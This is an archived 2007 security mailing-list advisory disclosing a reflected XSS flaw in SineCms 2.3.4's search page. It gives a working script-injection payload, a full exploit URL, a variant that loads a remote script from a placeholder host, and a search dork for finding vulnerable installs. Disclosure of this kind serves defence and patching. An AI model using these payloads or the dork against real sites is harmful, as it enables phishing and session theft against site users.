Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

SineCMS

from [nexus] Network Security [Permanent Link]
Subject: SineCMS
Date: Thu, 26 Apr 2007 10:35:02 +0200 
   .      .        .  
._ | _.  .|_  _. _.;_/
[_)|(_]\_|[ )(_](_.| \.net
|      ._|            
"SineCms Version 2.3.4 - Non-Persistent XSS Vulnerability"
        by Nexus

1) Infos
---------
Date            : 2007-04-26 (ISO 8601)
Product         : SineCms
Version         : 2.3.4 (last), prior versions may also be affected
Vendor          : http://sourceforge.net/projects/sine - http://www.sinecms.net
Vendor Status   : 2007-04-26 - Informed!

Description     : SineCms is a management software for international 
communication 
                  based on hypertext.

Google Dork     : "SineCms Version: 2.3.4"

Source          : nexus
E-mail          : nexus[at]playhack[dot]net
Team            : Playhack.net Security


2) Security Issues
-------------------
The core module for Search engine is affected by a Non-Persistent Cross-Site 
Scripting
vulnerability.
The source in "mods/Core/result.php" doesn't properly sanitize the input of the 
user
and just get the submitted text without any previous check on the content.
The affected variable is $_GET['stringa'], as a matter of fact if we try to 
insert a
string like:
        "><script>alert(1);</script>
The website will retrieve an url like:
        
host/path/mods.php?mods=Core&page=result&stringa=%22%3E%3Cscript%3Ealert%281
        %29%3C%2Fscript%3E&campo=all&criterio=tutte&ordine=decrescente

And it executes the JavaScript code.
The script makes only a check on apex, that can be simply avoided executing for 
example a remote script like
        "><script src=http://host.com/script.js></script>

It's easy to guess that this kind of vulnerability can be used to accomplish 
some
Phishing attacks, or whatever can be disfruted from an XSS flaw.


3) Patch
---------

Edit the core source code and sanitize properly the inputted data.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • SineCMS, nexus <=
Previous by Date:  Re: [Full-disclosure] WordPress v2.1.3 >> remote file include~, Tod Beardsley
Next by Date:  Re: Chicken of the VNC 2.0 remote DoS, support
Previous by Thread:  modbuild >> 4.1 Remote File Inclusion, s433d_only_linux
Next by Thread:  Re: Chicken of the VNC 2.0 remote DoS, support
Indexes:  [Date] [Thread] [Top] [All Lists]